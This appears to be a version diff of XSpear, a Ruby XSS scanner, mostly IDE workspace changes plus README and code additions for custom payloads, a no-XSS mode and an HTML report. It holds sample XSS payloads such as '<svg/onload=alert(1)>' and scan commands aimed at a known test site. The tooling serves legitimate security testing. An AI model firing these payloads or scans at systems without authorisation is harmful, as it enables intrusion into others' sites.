XSpear 1.3.3 → 1.4.0

Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: afb284c2c76350733a45156127bde1e8fd996a6aabf985b3eef8a1b43e8147a7
4
- data.tar.gz: f4411c5bdfb84d3ad32a87f34e1ffcd98a7ead48761b07134fcc82f5ded53f5b
3
+ metadata.gz: 32c726b87b11934044cacd01471bedab0f407185be09ba5018ec7f127d2f111d
4
+ data.tar.gz: 1faaf797b99c0e23a7280071c8cd9f010ff23c94dfd29d08edb116bb08b65b0e
5
5
  SHA512:
6
- metadata.gz: e031af8d10adfcdb511df45e0e9a34c19df1fdcbfc4bdcaf9179c584f25cf66df9d805204b85a8ef3c108495fa663c6e78dcc861549532d48556b867c9e5f65e
7
- data.tar.gz: 9dcd8c46a718c459ab7d2b8ebc8a8e4e9181a51d7d0c1c4280219bd3502caa16ea48cbfeb6a3ca02a6fc21d226606801a704ba77824d89bcd07150c3833d3cd8
6
+ metadata.gz: 607af7c1efc237340f376e87a603f5d0f8715de74d0dfa85ca139d1f85406dd3fc2f839b75cb4e9681c2ee3c63e7ced219d1364bc61de7717506a5c63c13c76e
7
+ data.tar.gz: 8d5e0667c104e834e3ea7a87ed9f4a79eca542dbc7c039083fc5c425a40460bc960db03f1aa65bc8522a44a0d0d8e6a55f8736f9da721e6445bca88656f61d27
data/.idea/workspace.xml CHANGED
@@ -3,6 +3,8 @@
3
3
  <component name="ChangeListManager">
4
4
  <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
5
5
  <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
6
+ <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
7
+ <change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
6
8
  <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
7
9
  </list>
8
10
  <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
@@ -19,29 +21,26 @@
19
21
  <file pinned="false" current-in-tab="false">
20
22
  <entry file="file://$PROJECT_DIR$/exe/XSpear">
21
23
  <provider selected="true" editor-type-id="text-editor">
22
- <state relative-caret-position="900">
23
- <caret line="60" column="77" selection-start-line="60" selection-start-column="77" selection-end-line="60" selection-end-column="77" />
24
+ <state relative-caret-position="1084">
25
+ <caret line="74" column="82" selection-start-line="74" selection-start-column="82" selection-end-line="74" selection-end-column="82" />
24
26
  </state>
25
27
  </provider>
26
28
  </entry>
27
29
  </file>
28
30
  <file pinned="false" current-in-tab="false">
29
- <entry file="file://$PROJECT_DIR$/README.md">
30
- <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
31
- <state split_layout="SPLIT">
32
- <first_editor relative-caret-position="6840">
33
- <caret line="456" column="38" selection-start-line="456" selection-start-column="38" selection-end-line="456" selection-end-column="38" />
34
- </first_editor>
35
- <second_editor />
31
+ <entry file="file://$PROJECT_DIR$/raw_sample.txt">
32
+ <provider selected="true" editor-type-id="text-editor">
33
+ <state relative-caret-position="30">
34
+ <caret line="2" column="9" lean-forward="true" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
36
35
  </state>
37
36
  </provider>
38
37
  </entry>
39
38
  </file>
40
- <file pinned="false" current-in-tab="false">
39
+ <file pinned="false" current-in-tab="true">
41
40
  <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
42
41
  <provider selected="true" editor-type-id="text-editor">
43
- <state relative-caret-position="1095">
44
- <caret line="73" selection-start-line="73" selection-end-line="73" />
42
+ <state relative-caret-position="217">
43
+ <caret line="361" column="39" selection-start-line="361" selection-start-column="39" selection-end-line="361" selection-end-column="39" />
45
44
  </state>
46
45
  </provider>
47
46
  </entry>
@@ -49,31 +48,35 @@
49
48
  <file pinned="false" current-in-tab="false">
50
49
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
51
50
  <provider selected="true" editor-type-id="text-editor">
52
- <state relative-caret-position="316">
53
- <caret line="539" column="443" selection-start-line="539" selection-start-column="443" selection-end-line="539" selection-end-column="443" />
51
+ <state relative-caret-position="260">
52
+ <caret line="497" lean-forward="true" selection-start-line="497" selection-end-line="497" />
54
53
  </state>
55
54
  </provider>
56
55
  </entry>
57
56
  </file>
58
57
  <file pinned="false" current-in-tab="false">
59
- <entry file="file://$PROJECT_DIR$/bin/console">
60
- <provider selected="true" editor-type-id="text-editor" />
58
+ <entry file="file://$PROJECT_DIR$/report.html">
59
+ <provider selected="true" editor-type-id="text-editor">
60
+ <state relative-caret-position="75">
61
+ <caret line="5" selection-start-line="5" selection-end-line="5" />
62
+ </state>
63
+ </provider>
61
64
  </entry>
62
65
  </file>
63
66
  <file pinned="false" current-in-tab="false">
64
- <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
67
+ <entry file="file://$PROJECT_DIR$/custom_payload.json">
65
68
  <provider selected="true" editor-type-id="text-editor">
66
- <state relative-caret-position="195">
67
- <caret line="13" column="38" selection-start-line="13" selection-start-column="38" selection-end-line="13" selection-end-column="38" />
69
+ <state relative-caret-position="150">
70
+ <caret line="10" column="3" selection-start-line="10" selection-start-column="3" selection-end-line="10" selection-end-column="3" />
68
71
  </state>
69
72
  </provider>
70
73
  </entry>
71
74
  </file>
72
- <file pinned="false" current-in-tab="true">
75
+ <file pinned="false" current-in-tab="false">
73
76
  <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
74
77
  <provider selected="true" editor-type-id="text-editor">
75
78
  <state relative-caret-position="15">
76
- <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
79
+ <caret line="1" column="16" selection-start-line="1" selection-start-column="16" selection-end-line="1" selection-end-column="16" />
77
80
  </state>
78
81
  </provider>
79
82
  </entry>
@@ -113,7 +116,6 @@
113
116
  <component name="FindInProjectRecents">
114
117
  <findStrings>
115
118
  <find>BLINDNOTDETECTED</find>
116
- <find>@all</find>
117
119
  <find>@reflected_params</find>
118
120
  <find>@thread</find>
119
121
  <find>thread</find>
@@ -126,6 +128,8 @@
126
128
  <find>EH</find>
127
129
  <find>CSP</find>
128
130
  <find>URI::encode</find>
131
+ <find>@all</find>
132
+ <find>for reflected</find>
129
133
  </findStrings>
130
134
  </component>
131
135
  <component name="Git.Settings">
@@ -135,24 +139,27 @@
135
139
  <option name="CHANGED_PATHS">
136
140
  <list>
137
141
  <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
138
- <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
139
142
  <option value="$PROJECT_DIR$/config.json" />
140
143
  <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
141
- <option value="$PROJECT_DIR$/exe/XSpear" />
142
144
  <option value="$PROJECT_DIR$/README.md" />
143
145
  <option value="$PROJECT_DIR$/XSpear.gemspec" />
144
146
  <option value="$PROJECT_DIR$/forBurp/otwa.sh" />
145
147
  <option value="$PROJECT_DIR$/forBurp/README.md" />
146
- <option value="$PROJECT_DIR$/lib/XSpear.rb" />
148
+ <option value="$PROJECT_DIR$/raw_sample.txt" />
149
+ <option value="$PROJECT_DIR$/exe/XSpear" />
150
+ <option value="$PROJECT_DIR$/report.html" />
151
+ <option value="$PROJECT_DIR$/custom_payload.json" />
147
152
  <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
153
+ <option value="$PROJECT_DIR$/lib/XSpear.rb" />
154
+ <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
148
155
  </list>
149
156
  </option>
150
157
  </component>
151
- <component name="ProjectFrameBounds">
158
+ <component name="ProjectFrameBounds" extendedState="6">
152
159
  <option name="x" value="-1920" />
153
- <option name="y" value="-620" />
160
+ <option name="y" value="-643" />
154
161
  <option name="width" value="1920" />
155
- <option name="height" value="1057" />
162
+ <option name="height" value="1080" />
156
163
  </component>
157
164
  <component name="ProjectLevelVcsManager" settingsEditedManually="true">
158
165
  <ConfirmationsSetting value="2" id="Add" />
@@ -162,6 +169,7 @@
162
169
  <foldersAlwaysOnTop value="true" />
163
170
  </navigator>
164
171
  <panes>
172
+ <pane id="Scope" />
165
173
  <pane id="ProjectPane">
166
174
  <subPane>
167
175
  <expand>
@@ -199,7 +207,6 @@
199
207
  <select />
200
208
  </subPane>
201
209
  </pane>
202
- <pane id="Scope" />
203
210
  </panes>
204
211
  </component>
205
212
  <component name="PropertiesComponent">
@@ -266,63 +273,8 @@
266
273
  <workItem from="1577115206395" duration="21990000" />
267
274
  <workItem from="1580314696983" duration="286000" />
268
275
  <workItem from="1580583824837" duration="1470000" />
269
- <workItem from="1581089876742" duration="268000" />
270
- </task>
271
- <task id="LOCAL-00030" summary="(1.0.6)[fixed #6] Edit Static Analysis code">
272
- <created>1563893769120</created>
273
- <option name="number" value="00030" />
274
- <option name="presentableId" value="LOCAL-00030" />
275
- <option name="project" value="LOCAL" />
276
- <updated>1563893769120</updated>
277
- </task>
278
- <task id="LOCAL-00031" summary="(1.0.6)[fixed #7] CallbackNotAdded 쪽 분기문 수정">
279
- <created>1563893901111</created>
280
- <option name="number" value="00031" />
281
- <option name="presentableId" value="LOCAL-00031" />
282
- <option name="project" value="LOCAL" />
283
- <updated>1563893901111</updated>
284
- </task>
285
- <task id="LOCAL-00032" summary="(1.0.6)[fixed #4] Report 객체 수정">
286
- <created>1563894048747</created>
287
- <option name="number" value="00032" />
288
- <option name="presentableId" value="LOCAL-00032" />
289
- <option name="project" value="LOCAL" />
290
- <updated>1563894048747</updated>
291
- </task>
292
- <task id="LOCAL-00033" summary="(1.0.6)[fixed #8] Added response header analysis module">
293
- <created>1563894186608</created>
294
- <option name="number" value="00033" />
295
- <option name="presentableId" value="LOCAL-00033" />
296
- <option name="project" value="LOCAL" />
297
- <updated>1563894186608</updated>
298
- </task>
299
- <task id="LOCAL-00034" summary="(1.0.6)[fixed #9] Added method in report-cli">
300
- <created>1563894430592</created>
301
- <option name="number" value="00034" />
302
- <option name="presentableId" value="LOCAL-00034" />
303
- <option name="project" value="LOCAL" />
304
- <updated>1563894430592</updated>
305
- </task>
306
- <task id="LOCAL-00035" summary="(1.0.6) Edit report &amp; scanning format">
307
- <created>1563895638242</created>
308
- <option name="number" value="00035" />
309
- <option name="presentableId" value="LOCAL-00035" />
310
- <option name="project" value="LOCAL" />
311
- <updated>1563895638242</updated>
312
- </task>
313
- <task id="LOCAL-00036" summary="(1.0.6)[fixed #5] Add blind-xss other pattern">
314
- <created>1563895850670</created>
315
- <option name="number" value="00036" />
316
- <option name="presentableId" value="LOCAL-00036" />
317
- <option name="project" value="LOCAL" />
318
- <updated>1563895850670</updated>
319
- </task>
320
- <task id="LOCAL-00037" summary="(1.0.6) Releases 1.0.6 version">
321
- <created>1563896026689</created>
322
- <option name="number" value="00037" />
323
- <option name="presentableId" value="LOCAL-00037" />
324
- <option name="project" value="LOCAL" />
325
- <updated>1563896026689</updated>
276
+ <workItem from="1581089876742" duration="615000" />
277
+ <workItem from="1581425741728" duration="13911000" />
326
278
  </task>
327
279
  <task id="LOCAL-00038" summary="(1.0.6) Edit README.md">
328
280
  <created>1563896886094</created>
@@ -611,11 +563,67 @@
611
563
  <option name="project" value="LOCAL" />
612
564
  <updated>1581090128596</updated>
613
565
  </task>
614
- <option name="localTasksCounter" value="79" />
566
+ <task id="LOCAL-00079" summary="Release 1.3.3 (Added New XSS Payloads)">
567
+ <created>1581090457081</created>
568
+ <option name="number" value="00079" />
569
+ <option name="presentableId" value="LOCAL-00079" />
570
+ <option name="project" value="LOCAL" />
571
+ <updated>1581090457081</updated>
572
+ </task>
573
+ <task id="LOCAL-00080" summary="(1.4 / Closed #51) Added only param analysis options">
574
+ <created>1581426071038</created>
575
+ <option name="number" value="00080" />
576
+ <option name="presentableId" value="LOCAL-00080" />
577
+ <option name="project" value="LOCAL" />
578
+ <updated>1581426071038</updated>
579
+ </task>
580
+ <task id="LOCAL-00081" summary="(1.4 / Closed #51) Added only param analysis options">
581
+ <created>1581427060990</created>
582
+ <option name="number" value="00081" />
583
+ <option name="presentableId" value="LOCAL-00081" />
584
+ <option name="project" value="LOCAL" />
585
+ <updated>1581427060990</updated>
586
+ </task>
587
+ <task id="LOCAL-00082" summary="(1.4 / Closed #41) Added custom payload option">
588
+ <created>1581428107580</created>
589
+ <option name="number" value="00082" />
590
+ <option name="presentableId" value="LOCAL-00082" />
591
+ <option name="project" value="LOCAL" />
592
+ <updated>1581428107580</updated>
593
+ </task>
594
+ <task id="LOCAL-00083" summary="(1.4 / Closed #41) Added custom payload option">
595
+ <created>1581428482520</created>
596
+ <option name="number" value="00083" />
597
+ <option name="presentableId" value="LOCAL-00083" />
598
+ <option name="project" value="LOCAL" />
599
+ <updated>1581428482520</updated>
600
+ </task>
601
+ <task id="LOCAL-00084" summary="(1.4 / Fixed #42) Bug fix --raw options, added --raw-ssl">
602
+ <created>1581430796984</created>
603
+ <option name="number" value="00084" />
604
+ <option name="presentableId" value="LOCAL-00084" />
605
+ <option name="project" value="LOCAL" />
606
+ <updated>1581430796984</updated>
607
+ </task>
608
+ <task id="LOCAL-00085" summary="(1.4 / Closed #52) Added HTML Report">
609
+ <created>1581529060550</created>
610
+ <option name="number" value="00085" />
611
+ <option name="presentableId" value="LOCAL-00085" />
612
+ <option name="project" value="LOCAL" />
613
+ <updated>1581529060550</updated>
614
+ </task>
615
+ <task id="LOCAL-00086" summary="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정">
616
+ <created>1581530432559</created>
617
+ <option name="number" value="00086" />
618
+ <option name="presentableId" value="LOCAL-00086" />
619
+ <option name="project" value="LOCAL" />
620
+ <updated>1581530432559</updated>
621
+ </task>
622
+ <option name="localTasksCounter" value="87" />
615
623
  <servers />
616
624
  </component>
617
625
  <component name="TimeTrackingManager">
618
- <option name="totallyTimeSpent" value="76057000" />
626
+ <option name="totallyTimeSpent" value="90315000" />
619
627
  </component>
620
628
  <component name="TodoView">
621
629
  <todo-panel id="selected-file">
@@ -627,10 +635,10 @@
627
635
  </todo-panel>
628
636
  </component>
629
637
  <component name="ToolWindowManager">
630
- <frame x="-1920" y="-620" width="1920" height="1057" extended-state="0" />
638
+ <frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
631
639
  <editor active="true" />
632
640
  <layout>
633
- <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.1368477" />
641
+ <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.13791268" />
634
642
  <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
635
643
  <window_info id="Favorites" order="2" side_tool="true" />
636
644
  <window_info anchor="bottom" id="Message" order="0" />
@@ -656,12 +664,6 @@
656
664
  <option name="version" value="1" />
657
665
  </component>
658
666
  <component name="VcsManagerConfiguration">
659
- <MESSAGE value="(1.1.1) Add code level function &amp; Check WAF code frame" />
660
- <MESSAGE value="(1.1.2) Releases &amp; Fixed #17 (Add some event handlers..)" />
661
- <MESSAGE value="(1.1.3) Releases &amp; Fixed #18 (Add onload* event handler)" />
662
- <MESSAGE value="(1.1.4) [Fixed #20 #22] Modified JSON Format&amp;Remove Color in XSpearReporter" />
663
- <MESSAGE value="(1.1.4) [Fixed #19] Add http.code, message log, edit log format on verbose=3" />
664
- <MESSAGE value="(1.1.4) Released 1.1.4" />
665
667
  <MESSAGE value="(1.1.5)(Fixed #21) not reflected params , no testing. but alway blind xss, other bug fix" />
666
668
  <MESSAGE value="(1.1.5) Released 1.1.5" />
667
669
  <MESSAGE value="(1.1.6) (Fixed #24) Edit Usage" />
@@ -681,7 +683,13 @@
681
683
  <MESSAGE value="Released 1.3.2" />
682
684
  <MESSAGE value="(Fixed #49) Add onpointerrawupdate event handler for xss" />
683
685
  <MESSAGE value="(Fixed #50) Add SVG Animate XSS Payload" />
684
- <option name="LAST_COMMIT_MESSAGE" value="(Fixed #50) Add SVG Animate XSS Payload" />
686
+ <MESSAGE value="Release 1.3.3 (Added New XSS Payloads)" />
687
+ <MESSAGE value="(1.4 / Closed #51) Added only param analysis options" />
688
+ <MESSAGE value="(1.4 / Closed #41) Added custom payload option" />
689
+ <MESSAGE value="(1.4 / Fixed #42) Bug fix --raw options, added --raw-ssl" />
690
+ <MESSAGE value="(1.4 / Closed #52) Added HTML Report" />
691
+ <MESSAGE value="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정" />
692
+ <option name="LAST_COMMIT_MESSAGE" value="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정" />
685
693
  </component>
686
694
  <component name="editorHistoryManager">
687
695
  <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -741,13 +749,6 @@
741
749
  </state>
742
750
  </provider>
743
751
  </entry>
744
- <entry file="file://$PROJECT_DIR$/exe/XSpear">
745
- <provider selected="true" editor-type-id="text-editor">
746
- <state relative-caret-position="900">
747
- <caret line="60" column="77" selection-start-line="60" selection-start-column="77" selection-end-line="60" selection-end-column="77" />
748
- </state>
749
- </provider>
750
- </entry>
751
752
  <entry file="file://$PROJECT_DIR$/README.md">
752
753
  <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
753
754
  <state split_layout="SPLIT">
@@ -758,13 +759,6 @@
758
759
  </state>
759
760
  </provider>
760
761
  </entry>
761
- <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
762
- <provider selected="true" editor-type-id="text-editor">
763
- <state relative-caret-position="1095">
764
- <caret line="73" selection-start-line="73" selection-end-line="73" />
765
- </state>
766
- </provider>
767
- </entry>
768
762
  <entry file="file://$PROJECT_DIR$/bin/console">
769
763
  <provider selected="true" editor-type-id="text-editor" />
770
764
  </entry>
@@ -799,17 +793,52 @@
799
793
  </state>
800
794
  </provider>
801
795
  </entry>
802
- <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
796
+ <entry file="file://$PROJECT_DIR$/raw_sample.txt">
803
797
  <provider selected="true" editor-type-id="text-editor">
804
- <state relative-caret-position="316">
805
- <caret line="539" column="443" selection-start-line="539" selection-start-column="443" selection-end-line="539" selection-end-column="443" />
798
+ <state relative-caret-position="30">
799
+ <caret line="2" column="9" lean-forward="true" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
800
+ </state>
801
+ </provider>
802
+ </entry>
803
+ <entry file="file://$PROJECT_DIR$/report.html">
804
+ <provider selected="true" editor-type-id="text-editor">
805
+ <state relative-caret-position="75">
806
+ <caret line="5" selection-start-line="5" selection-end-line="5" />
807
+ </state>
808
+ </provider>
809
+ </entry>
810
+ <entry file="file://$PROJECT_DIR$/custom_payload.json">
811
+ <provider selected="true" editor-type-id="text-editor">
812
+ <state relative-caret-position="150">
813
+ <caret line="10" column="3" selection-start-line="10" selection-start-column="3" selection-end-line="10" selection-end-column="3" />
814
+ </state>
815
+ </provider>
816
+ </entry>
817
+ <entry file="file://$PROJECT_DIR$/exe/XSpear">
818
+ <provider selected="true" editor-type-id="text-editor">
819
+ <state relative-caret-position="1084">
820
+ <caret line="74" column="82" selection-start-line="74" selection-start-column="82" selection-end-line="74" selection-end-column="82" />
806
821
  </state>
807
822
  </provider>
808
823
  </entry>
809
824
  <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
810
825
  <provider selected="true" editor-type-id="text-editor">
811
826
  <state relative-caret-position="15">
812
- <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
827
+ <caret line="1" column="16" selection-start-line="1" selection-start-column="16" selection-end-line="1" selection-end-column="16" />
828
+ </state>
829
+ </provider>
830
+ </entry>
831
+ <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
832
+ <provider selected="true" editor-type-id="text-editor">
833
+ <state relative-caret-position="260">
834
+ <caret line="497" lean-forward="true" selection-start-line="497" selection-end-line="497" />
835
+ </state>
836
+ </provider>
837
+ </entry>
838
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
839
+ <provider selected="true" editor-type-id="text-editor">
840
+ <state relative-caret-position="217">
841
+ <caret line="361" column="39" selection-start-line="361" selection-start-column="39" selection-end-line="361" selection-end-column="39" />
813
842
  </state>
814
843
  </provider>
815
844
  </entry>
data/README.md CHANGED
@@ -33,12 +33,14 @@ XSpear is XSS Scanner on ruby gems
33
33
  + Reflected Params
34
34
  + All params(for blind xss, anytings)
35
35
  + Filtered test `event handler` `HTML tag` `Special Char` `Useful code`
36
+ + Testing custom payload for only you!
36
37
  - Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
37
38
  - Dynamic/Static Analysis
38
39
  + Find SQL Error pattern
39
40
  + Analysis Security headers(`CSP` `HSTS` `X-frame-options`, `XSS-protection` etc.. )
40
41
  + Analysis Other headers..(Server version, Content-Type, etc...)
41
42
  + XSS Testing to URI Path
43
+ + Testing Only Parameter Analysis (aka no-XSS mode)
42
44
  - Scanning from Raw file(Burp suite, ZAP Request)
43
45
  - XSpear running on ruby code(with Gem library)
44
46
  - Show `table base cli-report` and `filtered rule`, `testing raw query`(url)
@@ -90,14 +92,17 @@ $ gem install progress_bar
90
92
  Usage: xspear -u [target] -[options] [value]
91
93
  [ e.g ]
92
94
  $ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a
93
- $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
95
+ $ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2
96
+ $ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 0 -o json
94
97
 
95
98
  [ Options ]
96
99
  -u, --url=target_URL [required] Target Url
97
100
  -d, --data=POST Body [optional] POST Method Body data
98
101
  -a, --test-all-params [optional] test to all params(include not reflected)
102
+ --no-xss [optional] no testing xss, only parameters analysis
99
103
  --headers=HEADERS [optional] Add HTTP Headers
100
104
  --cookie=COOKIE [optional] Add Cookie
105
+ --custom-payload=FILENAME [optional] Load custom payload json file
101
106
  --raw=FILENAME [optional] Load raw file(e.g raw_sample.txt)
102
107
  -p, --param=PARAM [optional] Test paramters
103
108
  -b, --BLIND=URL [optional] Add vector of Blind XSS
@@ -115,6 +120,7 @@ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
115
120
  --version Show XSpear version
116
121
  --update Show how to update
117
122
 
123
+
118
124
  ```
119
125
  ### Result types
120
126
  - (I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)
@@ -198,7 +204,6 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
198
204
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0
199
205
  ```
200
206
 
201
-
202
207
  **Set scanning thread**
203
208
  ```
204
209
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
@@ -215,6 +220,11 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhah
215
220
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a
216
221
  ```
217
222
 
223
+ **Testing Only parameter analysis (aka no-xss mode)**<br>
224
+ ```
225
+ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" --no-xss
226
+ ```
227
+
218
228
  **Testing blind xss(all params)**<br>
219
229
  (Should be used as much as possible because Blind XSS is everywhere)<br>
220
230
  ```
@@ -223,6 +233,31 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwu
223
233
  # Set your blind xss host. <-b options>
224
234
  ```
225
235
 
236
+ **Testing custom payload**<br>
237
+ ```
238
+ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" --custom-payload=custom_payload.json
239
+ ```
240
+ in custom_payload.json file
241
+ ```json
242
+ [
243
+ {
244
+ "payload":"<svg/onload=alert(1)>",
245
+ "callback":"P1",
246
+ "descript":"blahblah~"
247
+ },
248
+ {
249
+ "payload":"<svg/onload=alert(1)>",
250
+ "callback":"P2",
251
+ "descript":"blahblah~"
252
+ },
253
+ {
254
+ "payload":"<>",
255
+ "callback":"P1",
256
+ "descript":"blahblah~"
257
+ }
258
+ ]
259
+ ```
260
+
226
261
  **for Pipeline**<br>
227
262
  ```
228
263
  $ xspear -u {target} -b "your-blind-xss-host" -a -v 0 -o json
data/XSpear-1.3.3.gem ADDED
Binary file
@@ -0,0 +1,17 @@
1
+ [
2
+ {
3
+ "payload":"<svg/onload=alert(1)>",
4
+ "callback":"P1",
5
+ "descript":"blahblah~"
6
+ },
7
+ {
8
+ "payload":"<svg/onload=alert(1)>",
9
+ "callback":"P2",
10
+ "descript":"blahblah~"
11
+ },
12
+ {
13
+ "payload":"<>",
14
+ "callback":"P1",
15
+ "descript":"blahblah~"
16
+ }
17
+ ]
data/exe/XSpear CHANGED
@@ -3,6 +3,10 @@ require "XSpear"
3
3
 
4
4
  XOptions = Struct.new(:url, :data, :headers, :params, :options)
5
5
 
6
+ def true?(obj)
7
+ obj.to_s.downcase == "true"
8
+ end
9
+
6
10
  class Parser
7
11
  def self.parse(options)
8
12
  args = XOptions.new('xspear')
@@ -29,6 +33,10 @@ class Parser
29
33
  args.options['all'] = true
30
34
  end
31
35
 
36
+ opts.on('--no-xss', '[optional] no testing xss, only parameters analysis') do
37
+ args.options['nx'] = true
38
+ end
39
+
32
40
  opts.on('--headers=HEADERS', '[optional] Add HTTP Headers') do |n|
33
41
  args.options['headers'] = n
34
42
  end
@@ -38,11 +46,17 @@ class Parser
38
46
  args.options['cookie'] = 'Cookie: ' + n
39
47
  end
40
48
 
49
+ opts.on('--custom-payload=FILENAME', '[optional] Load custom payload json file') do |n|
50
+ args.options['cp'] = n
51
+ end
41
52
 
42
53
  opts.on('--raw=FILENAME', '[optional] Load raw file(e.g raw_sample.txt)') do |n|
43
54
  args.options['raw'] = n
44
55
  end
45
56
 
57
+ opts.on('--raw-ssl=BOOLEAN', '[optional] http/https switch for burp raw file e.g: true/false') do |n|
58
+ args.options['raw-ssl'] = n
59
+ end
46
60
 
47
61
  opts.on('-p', '--param=PARAM', '[optional] Test paramters') do |n|
48
62
  args.options['params'] = n
@@ -58,7 +72,7 @@ class Parser
58
72
  end
59
73
 
60
74
 
61
- opts.on('-o', '--output=FORMAT', '[optional] Output format (cli , json)') do |n|
75
+ opts.on('-o', '--output=FORMAT', '[optional] Output format (cli , json, html)') do |n|
62
76
  args.options['output'] = n
63
77
  end
64
78
 
@@ -129,15 +143,23 @@ if !options.options['raw'].nil?
129
143
  end
130
144
  end
131
145
  end
132
-
133
146
  # Burp or ZAP
134
147
  # http, https로 시작하면 zap 아니면 burp 포맷
135
148
  url = ""
136
149
  if (path.index('http://') == 0 || path.index('https://') == 0)
137
150
  url = path
138
151
  else
139
- url = "http://"+headers_hash['Host'].to_s.chomp!+"/"+path
152
+ if options.options['raw-ssl'].nil?
153
+ url = "https://"+headers_hash['Host'].to_s.chomp!+"/"+path
154
+ else
155
+ if true? options.options['raw-ssl']
156
+ url = "https://"+headers_hash['Host'].to_s.chomp!+"/"+path
157
+ else
158
+ url = "http://"+headers_hash['Host'].to_s.chomp!+"/"+path
159
+ end
160
+ end
140
161
  end
162
+ puts url
141
163
  options.url = url
142
164
  if headers.length > 0
143
165
  options.options['headers'] = headers
@@ -1,4 +1,5 @@
1
1
  require 'terminal-table'
2
+ require 'cgi'
2
3
 
3
4
  IssueStruct = Struct.new(:id, :type, :issue, :method, :param, :payload, :description)
4
5
  class IssueStruct
@@ -29,7 +30,7 @@ class XspearRepoter
29
30
  # desc
30
31
  # category
31
32
  # callback
32
- @rtype = {"i"=>"INFO".blue,"v"=>"VULN".red,"l"=>"LOW".green,"m"=>"MIDUM".yellow,"h"=>"HIGH".light_red}
33
+ @rtype = {"i"=>"INFO".blue,"v"=>"VULN".red,"l"=>"LOW".green,"m"=>"MEDIUM".yellow,"h"=>"HIGH".light_red}
33
34
  @rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
34
35
  end
35
36
 
@@ -62,6 +63,356 @@ class XspearRepoter
62
63
  @endtime = Time.now
63
64
  end
64
65
 
66
+ def to_html
67
+ rurl = ""
68
+ if @url.length > 66
69
+ rurl = @url[0..66]+"... (snip)"
70
+ else
71
+ rurl = @url
72
+ end
73
+ t_info= "Testing to <a href='#{CGI.escapeHTML @url}'>#{CGI.escapeHTML rurl}</a><br>Found #{@issue.length} issues and running on #{@starttime} ~ #{@endtime} "
74
+ t_issue = ""
75
+ t_available = ""
76
+ t_rawquery = ""
77
+ @issue.each do |i|
78
+ i[1] = i[1].uncolorize
79
+ i[6] = i[6].uncolorize
80
+ # NO TYPE ISSUE METHOD PARAM PAYLOAD DESCRIPTION
81
